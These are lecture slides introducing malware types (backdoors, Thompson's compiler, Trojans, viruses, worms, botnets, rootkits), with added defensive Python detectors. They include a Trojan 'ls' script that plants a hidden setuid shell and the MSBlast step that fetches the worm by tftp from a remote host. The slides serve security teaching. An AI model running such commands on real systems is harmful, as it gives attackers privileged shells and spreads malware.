Introduction to Malware
Dan Fleck, CS469 Security Engineering
Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop
What is Malicious Software?
Malicious Software (a.k.a. Malware)
• Software designed to infiltrate or damage a computer system, without the owner's informed consent -- http://en.wikipedia.org/wiki/Malware
• Examples: viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
• How about adware?
• Malware references the intent of the creator, rather than any particular features
  • DRM vs. rootkit (e.g., Sony CD rootkit)
Why should we care?
[Charts omitted]
Source: Symantec Internet Threat Report 2012
Taxonomy of Malicious Software
[Taxonomy diagram omitted]
Trapdoor/Backdoor
• Secret entry point into a system
• Specific user identifier or password that circumvents normal security procedures
• Commonly used by developers
• Could be included in a compiler
• Let’s see Thompson’s Compiler
November 1, 2004, Slide #19-8
Thompson's Compiler
• Modify the compiler so that when it compiles login, login accepts the user's correct password or a fixed password (the same one for all users)
• Then modify the compiler again, so when it compiles a new version of the compiler, the extra code to do the first step is automatically inserted
• Recompile the compiler
• Delete the source containing the modification and put the undoctored source back
The Login Program
  login source --(correct compiler)--> login executable: user password -> logged in
  login source --(doctored compiler)--> login executable: user password or magic password -> logged in
The Compiler
  compiler source --(correct compiler)--> compiler executable; login source --(that executable)--> correct login executable
  compiler source --(doctored compiler)--> compiler executable; login source --(that executable)--> rigged login executable
Thompson’s Lesson
Verifying the source code isn’t always enough!
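A toy model of the four steps above, added here as an illustration and not code from the slides or from Thompson: "sources" are strings, "compiling" them yields Python callables, and the toy compilers know only two programs. The values STORED and MAGIC are constructed, and the final check is a simplified form of Wheeler's diverse double-compiling, which the slides do not cover.

```python
# Added example (not from the slides): a toy model of the attack. "Sources" are
# strings and "compiling" them yields Python callables; the toy compilers know
# only two programs. STORED and MAGIC are constructed values.
LOGIN_SRC = "login: accept if password == stored"      # never changes
COMPILER_SRC = "compiler: translate source faithfully"  # never changes
STORED = "s3cret"   # the user's real password (constructed)
MAGIC = "magic"     # the fixed password for all users (constructed)

def correct_compile(source):
    """Honest compiler: login checks the stored password only; compiling the
    compiler source reproduces this honest compiler."""
    if source == LOGIN_SRC:
        return lambda pw: pw == STORED
    if source == COMPILER_SRC:
        return correct_compile
    raise ValueError("unknown program")

def doctored_compile(source):
    """Step 1: when compiling login, also accept MAGIC. Step 2: when compiling
    the (clean) compiler source, emit this doctored compiler again."""
    if source == LOGIN_SRC:
        return lambda pw: pw == STORED or pw == MAGIC
    if source == COMPILER_SRC:
        return doctored_compile
    raise ValueError("unknown program")

def rebuild_and_compile_login(bootstrap, generations=3):
    """Rebuild the compiler from the undoctored source `generations` times,
    starting from the given compiler binary, then compile login with it."""
    cc = bootstrap
    for _ in range(generations):
        cc = cc(COMPILER_SRC)       # clean source every time
    return cc(LOGIN_SRC)

def behaves_like_trusted(untrusted, trusted, probe=MAGIC):
    """Simplified diverse double-compiling (Wheeler): rebuild from the same
    clean source with an independent trusted compiler and compare what the
    two resulting login binaries do with a probe password."""
    a = rebuild_and_compile_login(untrusted)
    b = rebuild_and_compile_login(trusted)
    return a(probe) == b(probe)
```

Rebuilding from clean source any number of times never removes the rig once the bootstrap binary is doctored; only comparison against an independently built compiler exposes it.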
Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions met
  • E.g., presence/absence of some file; particular date/time or particular user
• When triggered, typically damages system
  • Modify/delete files/disks
• Example: Disgruntled employee adds trigger so that when the employee’s salary record is deleted from the DB, all personnel records are deleted also.
Can you think of other logic bombs?
Trojan Horse
Program with an expected and hidden effect
• Appears normal/expected
• Hidden effect violates security policy
User tricked into executing Trojan horse
• Expects (and sees) expected behavior
• Hidden effect performed with user’s authorization

Attacker:
    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof
Victim:
    ls
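Two checks a defender can run against the planted-ls scenario above, added here as an example and not code from the slides: resolve_command walks PATH the way the shell does, showing which file "ls" would really run from a given directory, and setuid_files lists set-UID files in a directory such as /tmp, where the planted script leaves its shell copy. The directory built by demo() is constructed.

```python
# Added example (not from the slides): checks against the planted-ls scenario.
# demo() builds a constructed /tmp-like directory so the check runs anywhere.
import os
import stat
import tempfile

def resolve_command(name, path_env, cwd, exists=os.path.exists):
    """Return the first file the shell would execute for `name`. A "." or empty
    PATH entry searches the current directory, which is how a victim working
    in the attacker-prepared directory ends up running the planted ls."""
    for entry in path_env.split(":"):
        directory = cwd if entry in ("", ".") else entry
        candidate = os.path.join(directory, name)
        if exists(candidate):
            return candidate
    return None

def path_searches_cwd(path_env):
    """True if PATH contains "." or an empty component."""
    return any(e in ("", ".") for e in path_env.split(":"))

def setuid_files(directory):
    """Names of set-UID regular files directly inside `directory`."""
    found = []
    for fn in os.listdir(directory):
        st = os.lstat(os.path.join(directory, fn))
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
            found.append(fn)
    return sorted(found)

def demo():
    """Constructed directory holding one set-UID file and one plain file."""
    d = tempfile.mkdtemp()
    for fn, mode in ((".xxsh", 0o4755), ("plain", 0o644)):
        p = os.path.join(d, fn)
        open(p, "w").close()
        os.chmod(p, mode)
    return setuid_files(d)
```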
Trojan Horse Example: NetBus
• Designed for Windows NT system
• Victim uploads and installs this
  • Usually disguised as a game program, or in one
• Acts as a server, accepting and executing commands for remote administrator
  • This includes intercepting keystrokes and mouse motions and sending them to attacker
  • Also allows attacker to upload, download files
Virus
• Program that inserts itself into one or more files and performs some action
  • Insertion phase is inserting itself into file
  • Execution phase is performing some (possibly null) action
• Self-replicating code
• Generally tries to remain undetected
• Pseudocode:
    if spread condition then
        for target files
            if not infected then alter to include virus
    perform malicious action
    execute normal program (step done only by Trojan horses to remain hidden)
Early Virus Reports
• Brain (Pakistani) virus (1986)
  • Written for IBM PCs
  • Alters boot sectors of floppies, spreads to other floppies
• MacMag Peace virus (1987)
  • Written for Macintosh
  • Prints “universal message of peace” on March 2, 1988 and deletes itself
Virus Types
Boot Sector
• Problem: How to ensure virus “carrier” executed?
• Solution: Place in boot sector of disk
  • Run on any boot
• Propagate by altering boot disk creation
• Less common with few boots off floppies
• Brain virus used this
Executable
• Malicious code placed at beginning of legitimate program (.EXE or .COM)
• Runs when application run
Virus Types
Macro Virus
• Infected “executable” isn’t machine code
• Relies on something “executed” inside application data
  • Common example: Macros
• Otherwise similar properties to other viruses
  • Architecture-independent
  • Application-dependent
Macro Virus Example
• Melissa
  • Infected Microsoft Word 97 and Word 98 documents
  • Windows and Macintosh systems
• Invoked when program opens infected file
  • Installs itself as “open” macro and copies itself into Normal template
  • This way, infects any files that are opened in future
• Invokes mail program, sends itself to everyone in user’s address book
Virus Types
Armored
• Encrypt virus
• Prevents “signature” detection of the virus
Stealth
• Conceal infection
  • Trap read and disinfect
  • Let execute call infected file
  • Request for file length: return length of uninfected file
  • Request to open file: temporarily disinfect file, and reinfect on closing
  • Request to load file for execution: load infected file
Terminate and Stay Resident (TSR)
• Stays active in memory after application complete
• Allows infection of previously unknown files
• Trap calls that execute a program
Virus Types
Polymorphic
• A virus that changes its form each time it inserts itself into another program
• Idea is to prevent signature detection by changing the “signature” or instructions used for the deciphering routine
  • At instruction level: substitute instructions
  • At algorithm level: different algorithms to achieve the same purpose
• Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine)
Polymorphic Example
• These are different instructions (with different bit patterns) but have the same effect:
  • add 0 to register
  • subtract 0 from register
  • xor 0 with register
  • no-op
• Polymorphic virus would pick randomly from among these instructions
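Why the substitution above defeats a plain byte signature, and how a scanner recovers by normalising equivalent instructions before matching; this is an added example, not code from the slides. The byte encodings are 32-bit x86 forms operating on EAX, and the "payload" is a constructed stand-in for a body, not virus code.

```python
# Added example (not from the slides): a byte signature misses a variant that
# swapped one do-nothing instruction for another; normalising them first
# restores the match. Encodings are 32-bit x86 on EAX; PAYLOAD is constructed.
NOOP_FORMS = {
    b"\x83\xc0\x00": "add eax,0",
    b"\x83\xe8\x00": "sub eax,0",
    b"\x83\xf0\x00": "xor eax,0",
    b"\x90":         "nop",
}
CANON = b"\x90"                       # every form is rewritten to this
PAYLOAD = b"\xb8\x01\x00\x00\x00"      # mov eax,1: constructed stand-in body

def make_variant(form):
    """One variant: the chosen do-nothing prefix followed by the same body."""
    return form + PAYLOAD

def signature_match(code, sig):
    """Plain byte-signature scan, as a naive scanner would do."""
    return sig in code

def normalize(code):
    """Rewrite each recognised do-nothing instruction to CANON so that all
    variants collapse to one byte string."""
    out, i = bytearray(), 0
    while i < len(code):
        for form in NOOP_FORMS:
            if code.startswith(form, i):
                out += CANON
                i += len(form)
                break
        else:
            out.append(code[i])
            i += 1
    return bytes(out)

def normalized_match(code, sig):
    """Signature scan after normalising both the sample and the signature."""
    return normalize(sig) in normalize(code)
```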
Worm
• Runs independently
  • Does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks
  • Backdoors, spam relays, DDoS agents, …
• Phases: Probing, Exploitation, Replication, Payload
So, how is a virus different from a worm?
Worm Propagation
[Propagation diagram omitted]
MSBlast Worm (Aug 2003)
Infected host -> New Victim:
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69
6. Sends “TFTP” command to shell
7. Runs TFTP command: teleports msblast.exe file
       tftp -l 192.168.0.1 GET msblast.exe
8. Sends “START msblast.exe” command
9. Runs worm on target
10. Closes connection
11. Shell closes
Firewall rule shown on the slide:
    TCP protocol; Direction: Inbound; Local end point ports: 135; Application: ANY; Remote End Point: ANY/ANY; Rule valid: ALWAYS; Action: DENY
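A detector for the connection sequence above, added here as an example and not code from the slides: a source host is flagged when it hits a victim on 135/tcp, then 4444/tcp, and the victim then fetches from it on 69/udp (TFTP) within a time window. The flow records are constructed; a lone 135/tcp probe with no follow-up is deliberately left unflagged.

```python
# Added example (not from the slides): flags hosts whose flows follow the
# MSBlast chain 135/tcp -> 4444/tcp -> victim pulls over 69/udp. FLOWS is a
# constructed sample of (seconds, src, dst, proto, dst_port) records.
from collections import defaultdict

FLOWS = [
    (0, "10.0.0.5", "10.0.0.9", "tcp", 135),
    (1, "10.0.0.5", "10.0.0.9", "tcp", 4444),
    (2, "10.0.0.9", "10.0.0.5", "udp", 69),     # victim fetches msblast.exe back
    (3, "10.0.0.7", "10.0.0.9", "tcp", 135),    # single RPC hit, no follow-up
    (4, "10.0.0.9", "10.0.0.8", "tcp", 445),
]

def find_msblast_chains(flows, window=60):
    """Return sorted (attacker, victim) pairs whose flows match the chain
    within `window` seconds of the initial 135/tcp connection."""
    by_pair = defaultdict(list)
    for t, src, dst, proto, port in flows:
        by_pair[(src, dst)].append((t, proto, port))

    def times(pair, proto, port):
        # timestamps of flows src->dst on the given protocol and port
        return [t for t, p, d in by_pair.get(pair, []) if p == proto and d == port]

    hits = set()
    for att, vic in list(by_pair):
        for t0 in times((att, vic), "tcp", 135):
            def in_win(t):
                return t0 <= t <= t0 + window
            got_shell = any(in_win(t) for t in times((att, vic), "tcp", 4444))
            got_tftp = any(in_win(t) for t in times((vic, att), "udp", 69))
            if got_shell and got_tftp:
                hits.add((att, vic))
    return sorted(hits)
```

The slide's firewall rule (deny inbound TCP to 135) stops the first step outright; this detector is for the case where that rule was not in place and the chain already ran.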
Zombie
• Secretly takes over another networked computer by exploiting software flaws
• Builds the compromised computers into a zombie network or botnet
• Uses it to indirectly launch attacks
  • E.g., DDoS
Let’s see how we create zombies..
Zombie: Steps
1. Attacker scans Internet for unsecured systems that can be compromised
2. Attacker secretly installs zombie agent program, turning unsecured computers into zombies
3. Zombie agents “phone home” and connect to a master server
4. Attacker sends commands to Master Server to launch a DDoS attack against a targeted system
5. Master server sends signal to zombies to launch attack on targeted system
6. Target system is overwhelmed by zombie requests, denying requests from normal users (“Request Denied”)
Rootkit
• “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer”
• Goals:
  • Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.)
  • Provide hidden backdoor access
Linux RootKit III
Program     Status            Purpose
ls          Trojaned!         Hide files
du          Trojaned!         Hide files
ifconfig    Trojaned!         Hide sniffing
netstat     Trojaned!         Hide connections
chfn        Trojaned!         User->r00t
chsh        Trojaned!         User->r00t
inetd       Trojaned!         Remote access
login       Trojaned!         Remote access
passwd      Trojaned!         User->r00t
ps          Trojaned!         Hide processes
top         Trojaned!         Hide processes
rshd        Trojaned!         Remote access
syslogd     Trojaned!         Hide logs
linsniffer  Packet sniffer!
fix         File fixer!
z2          Zap2 utmp/wtmp/lastlog eraser!
wted        wtmp/utmp editor!
lled        lastlog editor!
bindshell   port/shell type daemon!
tcpd        Trojaned!         Hide connections, avoid denies
Rootkit
• Simple rootkits:
  • Modify user programs (ls, ps)
  • Detectable by tools like Tripwire
• Sophisticated rootkits:
  • Modify the kernel itself
  • Hard to detect from userland
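A Tripwire-style integrity check for the simple-rootkit case above (user-land binaries such as ls and ps swapped for Trojaned copies), added here as an example and not code from the slides or from Tripwire: baseline() records SHA-256 digests and verify() reports what changed. The ls/ps/du files in demo() are constructed stand-ins in a temp directory.

```python
# Added example (not from the slides): baseline-and-verify integrity check
# for replaced user-land binaries. demo() uses constructed stand-in files.
import hashlib
import os
import tempfile

def file_digest(path):
    """SHA-256 of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(paths):
    """Map each path to its digest; keep the result off the monitored host."""
    return {p: file_digest(p) for p in paths}

def verify(base):
    """Return {path: 'ok' | 'modified' | 'missing'} against a stored baseline."""
    report = {}
    for p, digest in base.items():
        if not os.path.isfile(p):
            report[p] = "missing"
        elif file_digest(p) != digest:
            report[p] = "modified"
        else:
            report[p] = "ok"
    return report

def demo():
    """Stand-in ls/ps/du, baseline them, then tamper the way a rootkit would."""
    d = tempfile.mkdtemp()
    paths = {n: os.path.join(d, n) for n in ("ls", "ps", "du")}
    for p in paths.values():
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho original\n")
    base = baseline(list(paths.values()))
    with open(paths["ls"], "w") as f:       # Trojaned ls swapped in
        f.write("#!/bin/sh\necho trojaned\n")
    os.remove(paths["du"])                   # du removed outright
    return {os.path.basename(p): s for p, s in verify(base).items()}
```

This only catches the simple case: a kernel-level rootkit can hand the checker clean file contents (the same trick the Stealth virus plays on open and read requests), so the baseline and the checker should run from trusted read-only media rather than on the suspect system.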
Rootkit Classification
• Replace apps
• Add code to all apps
• Replace/modify kernel modules
• Run entire OS in a virtual machine
See: http://www.phrack.org/issues.html?issue=62&id=12
Lessons
• Malware comes in many types and styles
• It’s not going away and will always hit new platforms as they come out
• We’ll need multiple approaches to defend against them.
Next up: Malware Defense!